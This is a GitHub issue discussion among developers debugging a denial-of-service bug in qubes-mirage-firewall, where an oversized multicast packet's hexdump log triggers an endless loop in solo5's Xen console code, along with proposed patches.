On Sun, 4 Dec 2022 at 11:43, Hannes Mehnert ***@***.***> wrote: From reading some source code (sorry don't have my QubesOS laptop nearby), the destination address in the above mentioned IPv4 is in the multicast admin range (thus Ipaddr.scope returns Admin), and mirage-nat checks in nat_rewrite.ml function add whether both source and destination are in Global or Organization. If not, the `Cannot_NAT error is returned. Now, from the terminal output it looks like we're seeing output from firewall.ml in function add_nat_and_forward_ipv4, which before 0.7.1 used pp_header, and now Nat_packet.pp (87df5bd #diff-ec9fe4e557558e9f9cb06c4011300f8bdf4fa73809d7202f11d2a0119b34dff9L118 <87df5bd#diff-ec9fe4e557558e9f9cb06c4011300f8bdf4fa73809d7202f11d2a0119b34dff9L118>) (which shouldn't make a difference). There's some broken log output (after the first dump, a closing parenthesis is present ), but afterwards some more hexdump is present, and the next log messages are indented). Would you mind to test with some smaller packets (atm the UDP payload is 607 bytes, does it also fail with fewer bytes?) - it may be related to fragmentation and reassembly (though MTU should be ~1500). — Reply to this email directly, view it on GitHub <#166 (comment)>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/AABR2EFCKA7WHRPB3H457SLWLRYVNANCNFSM6AAAAAASTCCVRI> . You are receiving this because you are subscribed to this thread.Message ID: ***@***.***>

[palainp]

I can confirm that the python code causes DoS on 0.8.3 too.

I just tried filtering multicast destinations (all 224.0.0.0/4 range, both client and netvm) in https://github.com/palainp/qubes-mirage-firewall/tree/fix-dos. This patch mitigates the proposed DoS. I'll see if there are any side effects before PR it.

[hannesm]

@palainp interesting, but the mirage-nat in nat_rewrite already checks the multicast (scope, as mentioned above, may need some adjustments). I think we need to figure out why the log message being printed is never-ending/repeating if `Cannot_NAT is returned from Nat.add (in my_nat.ml)?

[palainp]

Update:
I had problems when I tried to do a pretty_print of the guilty packet. I then tried @hannesm's path (atm UDP payload is 607 bytes, does it fail with less bytes?) and the patch at https://github.com/palainp/mirage-nat/tree/pp-limit-payload which limits the pretty print to 10 bytes does not suffer from DoS behaviour.

I'm not sure how a very long Cstruct.hexdump_pp can produce this kind of infinite loop, and it might be useful to print more than that with a maximum of 10B, so my patch may be too limiting here :(

[hannesm]

Discussing with @palainp, what changed between 0.7 and 0.8 is mainly PV -> PVH (and mini-os -> solo5). Now, the code printing log messages is from solo5 (in bindings/xen/console.c) -- which in contrast to mini-os doesn't do any memory_barrier (the mirage-console code does calls to memory barriers -- I'm not sure whether they're needed) [the call chain is via ocaml-solo5's nolibc that defines in sysdeps_solo5 the function write (that the OCaml runtime uses for Printf.fprintf stderr (what the mirage-logs reporter calls)) which uses solo5_console_write -- which is defined in solo5 bindings/xen/platform.c to call platform_puts which calls console_write].

So maybe to reduce the test case we should investigate whether super-long log messages on xen are an issue (100% cpu load), and figure out how to fix this (by looking deeply into solo5 bindings/xen/console.c).

[palainp]

@hannesm you're right, printing a log longer than 440B (EDIT: more than 2048B, with every payload byte as 3 printed characters: 2 nibbles + 1 space, and a small count of bytes for the timestamp) will loop (Solo5/solo5#537 for further investigating).